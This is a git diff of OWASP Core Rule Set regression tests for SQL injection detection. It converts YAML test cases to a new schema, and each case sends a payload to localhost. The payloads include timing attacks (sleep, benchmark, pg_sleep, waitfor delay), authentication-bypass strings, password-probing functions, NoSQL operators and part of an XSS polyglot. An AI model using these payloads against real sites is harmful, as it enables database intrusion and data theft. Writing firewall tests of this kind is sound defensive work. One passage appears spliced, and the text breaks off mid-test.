"SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 11 desc: "SQL injection using unistr() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=unistr(password)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 6b2576b89..80057834e 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -2,54 +2,53 @@ meta: author: "Franziska Bühler, azurit" description: Various SQL injection tests - enabled: true - name: 942152.yaml +rule_id: 942152 tests: - - test_title: 942152-1 + - test_id: 1 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] + - test_id: 2 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] + - test_id: 3 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index 86811feb2..511fd3e00 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,175 +1,173 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942160.yaml +rule_id: 942160 tests: - - test_title: 942160-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/if(now()=sysdate(),sleep(12),0)" - version: HTTP/1.0 - output: - log_contains: id "942160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6dff839b3..44ce44bdd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -1,71 +1,69 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942170.yaml +rule_id: 942170 tests: - - test_title: 942170-1 + - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3B%20sleep%280%29" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=I%20sleep%20well%21" - version: HTTP/1.0 - output: - no_log_contains: id "942170" - - test_title: 942170-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942170] + - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=select+if(x" - version: HTTP/1.0 - output: - log_contains: id "942170" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=select+if(x" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index b467c61d0..8b96a08c5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,137 +1,135 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942180.yaml +rule_id: 942180 tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942180] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log: + expect_ids: [942251] + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942251] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b996f..82641f3a8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, Christian Folini, azurit" - description: None - enabled: true - name: 942260.yaml +rule_id: 942260 tests: - - test_title: 942260-1 + - test_id: 1 desc: "Basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something LIKE ' - uri: "/get?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/get?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942260] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 812a06146..0afc59e87 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942270.yaml +rule_id: 942270 tests: - - test_title: 942270-1 + - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" - - test_title: 942270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] + - test_id: 2 desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=Xunionselectfrom" - version: HTTP/1.0 - output: - log_contains: id "942270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 7608a7f2d..07d1d74fb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942280.yaml +rule_id: 942280 tests: - - test_title: 942280-1 + - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" - - test_title: 942280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] + - test_id: 2 desc: "SQL Server waitfor delay attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942280" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index 82f810d9a..bac70548f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -1,161 +1,159 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 942290.yaml +rule_id: 942290 tests: - - test_title: 942290-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$ne]=2" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$ne]=2" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 2 desc: "basic MongoDB NOSQL injection attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 